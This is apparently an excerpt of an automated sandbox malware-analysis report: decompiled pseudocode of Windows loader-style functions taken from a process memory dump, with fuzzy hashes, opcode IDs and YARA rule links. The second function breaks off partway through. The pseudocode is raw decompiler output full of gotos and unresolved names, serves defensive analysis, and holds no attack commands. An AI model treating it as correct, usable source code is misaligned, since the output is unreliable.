Instruction Fuzzy Hash: ABF16430A087518FD765CF28C950B2BBFE5AF86360F09895DEA968B380D771D841CF86

Uniqueness

Uniqueness Score: -1.00%

Function 0360D5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E0360D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x36ed360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E03606600(0x36e52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x36e7b9c; // 0x0
							_t281 = L03614620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0363F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x36e7b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x36e7b8c; // 0xfa29e0
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E03612280(_t200, 0x36e84d8);
									_t277 =  *0x36e85f4; // 0xfa2ed0
									_t351 =  *0x36e85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xfa2e68
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0360FFB0(_t287, _t353, 0x36e84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E0364CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E03606600(0x36e52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E03607926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x36eb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0367E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x36e8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x36eb218; // 0x0
														asm("ror edi, cl");
														 *0x36eb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E03612280(_t250, 0x36e84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L03633898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0360FFB0(_t293, _t353, 0x36e84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E036337F5(_t353, 0);
																}
																E03630413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E03629B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E036202D6(_t174);
																}
																L036177F0( *0x36e7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0362C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0360EC7F(_t353);
										L036219B8(_t287, 0, _t353, 0);
										_t200 = E035FF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0363B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x36eb2f8; // 0x1280000
									if((_t206 |  *0x36eb2fc) == 0 || ( *0x36eb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x36eb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E036A6B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E036A6AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0360E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0360EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E03639730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0360E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L03608F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03633C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x0360d5f2
0x0360d5f5
0x0360d5f5
0x0360d5fd
0x0360d600
0x0360d60a
0x0360d60d
0x0360d617
0x0360d61d
0x0360d627
0x0360d62e
0x0360d911
0x0360d913
0x00000000
0x0360d919
0x0360d919
0x0360d919
0x0360d634
0x0360d634
0x0360d634
0x0360d634
0x0360d640
0x0360d8bf
0x00000000
0x0360d646
0x0360d646
0x0360d64d
0x0360d652
0x0365b2fc
0x0365b2fc
0x0365b302
0x0365b33b
0x0365b341
0x00000000
0x0365b304
0x0365b304
0x0365b319
0x0365b31e
0x0365b324
0x0365b326
0x0365b332
0x0365b347
0x0365b34c
0x0365b351
0x0365b35a
0x00000000
0x0365b328
0x0365b328
0x00000000
0x0365b328
0x0365b326
0x0360d658
0x0360d658
0x0360d65b
0x0360d665
0x00000000
0x0360d66b
0x0360d66b
0x0360d66b
0x0360d66b
0x0360d66d
0x0360d672
0x0360d67a
0x00000000
0x00000000
0x0360d680
0x0360d686
0x0360d8ce
0x0360d8d4
0x0360d8dd
0x0360d8e0
0x0360d68c
0x0360d691
0x0360d69d
0x0360d6a2
0x0360d6a7
0x0360d6b0
0x0360d6b5
0x0360d6e0
0x0360d6b7
0x0360d6b7
0x0360d6b9
0x0360d6b9
0x0360d6bb
0x0360d6bd
0x0360d6ce
0x0360d6d0
0x0360d6d2
0x0365b363
0x0365b365
0x00000000
0x0365b36b
0x00000000
0x0365b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0360d6bf
0x0360d6bf
0x0360d6e5
0x0360d6e7
0x0360d6e9
0x0360d6ec
0x0360d6ec
0x0360d6ef
0x0360d6f5
0x0360d6f9
0x0360d6fb
0x0360d6fd
0x0360d701
0x0360d703
0x0360d70a
0x0360d70a
0x0360d701
0x0360d710
0x0360d710
0x0360d6c1
0x0360d6c1
0x0360d6c6
0x0365b36d
0x0365b36f
0x00000000
0x0365b375
0x0365b375
0x0365b375
0x00000000
0x0365b375
0x00000000
0x0360d6cc
0x0360d6d8
0x0360d6d8
0x0360d6d8
0x00000000
0x0360d6c6
0x0360d6bf
0x00000000
0x0360d6da
0x0360d6da
0x0360d716
0x0360d71b
0x0360d720
0x0360d726
0x0360d726
0x0360d72d
0x00000000
0x0360d733
0x0360d739
0x0360d742
0x0360d750
0x0360d758
0x0360d764
0x0360d776
0x0360d77a
0x0360d783
0x0360d928
0x0360d92c
0x0360d93d
0x0360d944
0x0360d94f
0x0360d954
0x0360d956
0x0360d95f
0x0360d961
0x0360d973
0x0360d973
0x0360d956
0x0360d944
0x0360d92c
0x0360d78b
0x0365b394
0x0360d791
0x0360d798
0x0365b3a3
0x0365b3bb
0x0365b3bb
0x0360d7a5
0x0360d866
0x0360d870
0x0360d884
0x0360d892
0x0360d898
0x0360d89e
0x0360d8a0
0x0360d8a6
0x0360d8ac
0x0360d8ae
0x0360d8b4
0x0360d8b4
0x0360d8ae
0x0360d7a5
0x0360d78b
0x0360d7b1
0x0365b3c5
0x0365b3c5
0x0360d7c3
0x0360d7ca
0x0360d7e5
0x0360d7eb
0x0360d8eb
0x0360d8ed
0x00000000
0x0360d8f3
0x0360d8f3
0x0360d8f3
0x00000000
0x0360d8ed
0x0360d7cc
0x0360d7cc
0x0360d7d2
0x00000000
0x0360d7d4
0x0360d7d4
0x0360d7d7
0x0360d7df
0x0365b3d4
0x0365b3d9
0x0365b3dc
0x0365b3dc
0x0365b3df
0x0365b3e2
0x0365b468
0x0365b46d
0x0365b46f
0x0365b46f
0x0365b475
0x0360d8f8
0x0360d8f9
0x0360d8fd
0x0365b3e8
0x0365b3e8
0x0365b3eb
0x0365b3ed
0x00000000
0x0365b3ef
0x0365b3ef
0x0365b3f1
0x0365b3f4
0x0365b3fe
0x0365b404
0x0365b409
0x0365b40e
0x0365b410
0x0365b410
0x0365b414
0x0365b414
0x0365b41b
0x0365b420
0x0365b423
0x0365b425
0x0365b427
0x0365b42a
0x0365b42d
0x0365b42d
0x0365b42a
0x0365b432
0x0365b436
0x0365b438
0x0365b43b
0x0365b43b
0x0365b449
0x0365b44e
0x0365b454
0x0365b458
0x0365b458
0x0365b45d
0x00000000
0x0365b45d
0x0365b3ed
0x00000000
0x00000000
0x00000000
0x0360d7df
0x0360d7d2
0x0360d7ca
0x0365b37c
0x0365b37e
0x0365b385
0x0365b38a
0x00000000
0x0365b38a
0x0360d742
0x0360d7f1
0x0360d7f8
0x0365b49b
0x0365b49b
0x0360d800
0x0360d837
0x0360d843
0x0360d845
0x0360d847
0x0360d84a
0x0360d84b
0x0360d84e
0x0360d857
0x0360d802
0x0360d802
0x0360d80d
0x00000000
0x0360d818
0x0360d818
0x0360d824
0x0360d831
0x0365b4a5
0x0365b4ab
0x0365b4b3
0x0365b4b8
0x0365b4bb
0x00000000
0x0365b4c1
0x0365b4c1
0x0365b4c8
0x00000000
0x0365b4ce
0x0365b4d4
0x0365b4e1
0x0365b4e3
0x0365b4e5
0x00000000
0x0365b4eb
0x0365b4f0
0x0365b4f2
0x0360dac9
0x0360dacc
0x0360dacf
0x0360dad1
0x0360dd78
0x0360dd78
0x0360dcf2
0x00000000
0x0360dad7
0x0360dad9
0x0360dadb
0x00000000
0x00000000
0x0360dae1
0x0360dae1
0x0360dae4
0x0360dae6
0x0365b4f9
0x0365b4f9
0x0365b500
0x0360daec
0x0360daec
0x0360daf5
0x0360daf8
0x0360dafb
0x0360db03
0x0360db11
0x0360db16
0x0360db19
0x0360db1b
0x0365b52c
0x0365b531
0x0365b534
0x0360db21
0x0360db21
0x0360db24
0x0360dcd9
0x0360dce2
0x0360dce5
0x0360dd6a
0x0360dd6d
0x00000000
0x0360dd73
0x0365b51a
0x0365b51c
0x0365b51f
0x0365b524
0x00000000
0x0365b524
0x0360dce7
0x0360dce7
0x0360dce7
0x00000000
0x0360dce7
0x00000000
0x0360db2a
0x0360db2c
0x0360db31
0x0360db33
0x0360db36
0x0360db39
0x0360db3b
0x0360db66
0x0360db66
0x0360db3d
0x0360db3d
0x0360db3e
0x0360db46
0x0360db47
0x0360db49
0x0360db4c
0x0360db53
0x0360db55
0x0360db58
0x0360db5a
0x0365b50a
0x0365b50f
0x0365b512
0x0360db60
0x0360db60
0x0360db63
0x0360db63
0x00000000
0x0360db63
0x0360db5a
0x0360db3b
0x0360db24
0x0360db69
0x0360db69
0x0360db6c
0x0360db6f
0x0360db74
0x0365b557
0x0365b557
0x0365b55e
0x0360db7a
0x0360db7c
0x0360db7f
0x0360db82
0x0360db85
0x00000000
0x0360db8b
0x0360db8b
0x0360db8d
0x0360db9b
0x0360db9b
0x0360db9d
0x0360dba0
0x0360dba2
0x0360dba4
0x0360dba7
0x0360dba9
0x0360dbae
0x0360dbae
0x0360dbb1
0x0360dbb4
0x0360dbb4
0x0360dbb7
0x0360dbba
0x0360dcd2
0x0360dcd4
0x00000000
0x0360dbc0
0x0360dbc0
0x0360dbd2
0x0360dbd7
0x0360dbda
0x0360dbdd
0x0360dbdf
0x00000000
0x0360dbe5
0x0360dbe5
0x0360dbee
0x0360dbf1
0x0365b541
0x0365b544
0x00000000
0x0365b546
0x0365b546
0x00000000
0x0365b546
0x0360dbf7
0x0360dbf7
0x0360dbfd
0x0360dbfd
0x0360dbff
0x0360dc0b
0x0360dc15
0x0360dc1b
0x0360dc1d
0x0360dc21
0x0360dc21
0x0360dc23
0x0360dc23
0x0360dc26
0x0360dc29
0x0360dc2b
0x00000000
0x00000000
0x0360dc31
0x0360dc34
0x0360dc36
0x0360dcbf
0x0360dcbf
0x0360dcc2
0x00000000
0x0360dc3c
0x0360dc41
0x0360dc43
0x00000000
0x0360dc45
0x0360dc45
0x0360dc47
0x00000000
0x0360dc4d
0x0360dc4d
0x0360dc50
0x0360dc52
0x0360dc55
0x0360dcfa
0x0360dcfe
0x0360dd08
0x0360dd0a
0x0360dd0c
0x00000000
0x0360dd12
0x0360dd15
0x0360dd2d
0x0360dd2f
0x0360dd32
0x0360dd35
0x00000000
0x0360dd35
0x0360dc5b
0x0360dc5b
0x0360dc5e
0x0360dc61
0x0360dc64
0x0360dc67
0x0360dc67
0x0360dc6a
0x0360dc6c
0x0360dc8e
0x0360dc8e
0x0360dc91
0x0360dc93
0x0360dcce
0x0360dcce
0x0360dc95
0x0360dc9c
0x0360dc6e
0x0360dc72
0x0360dc75
0x0360dc77
0x0360dc79
0x0365b551
0x0365b551
0x00000000
0x0360dc7f
0x0360dc7f
0x0360dc81
0x00000000
0x0360dc83
0x0360dc86
0x0360dc88
0x00000000
0x00000000
0x00000000
0x00000000
0x0360dc88
0x0360dc81
0x0360dc79
0x0360dc6c
0x0360dc55
0x0360dc47
0x0360dc43
0x00000000
0x0360dc36
0x0360dc23
0x00000000
0x0360dbff
0x0360dbf1
0x0360dbdf
0x0360db8f
0x0360db92
0x0360db95
0x00000000
0x00000000
0x00000000
0x00000000
0x0360db95
0x0360db8d
0x0360db85
0x0360db74
0x0360dc9f
0x0360dca2
0x0360dcb0
0x0360dcb0
0x0360dad1
0x0365b4e5
0x0365b4c8
0x00000000
0x00000000
0x00000000
0x0360d831
0x0360d80d
0x00000000
0x0360d800
0x0365b47f
0x0365b485
0x00000000
0x0365b485
0x0360d665
0x0360d652
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3732344c0110e0250ed2c9311255ad168fad38736801a484bd24b43c66db346d
Instruction ID: e957fd7983e617170ea5033534cdba84fd1917164531be206c1359034a4fa7e3
Opcode Fuzzy Hash: 3732344c0110e0250ed2c9311255ad168fad38736801a484bd24b43c66db346d
Instruction Fuzzy Hash: C9E1C134A00719CFDB38DF68CA85B6AB7B5BF45304F0802A9E909AB3D0D7709985CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0360849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0360849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x36cf9c0);
				E0364D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x36e7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E0360CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E03612280( *[fs:0x30], 0x36e8550);
						_t139 =  *0x36e7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0362F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E0360FFB0(_t193, _t235, 0x36e8550);
								L5:
								return E0364D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E035F1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x36e7b9c; // 0x0
							_t235 = L03614620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x36e7b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
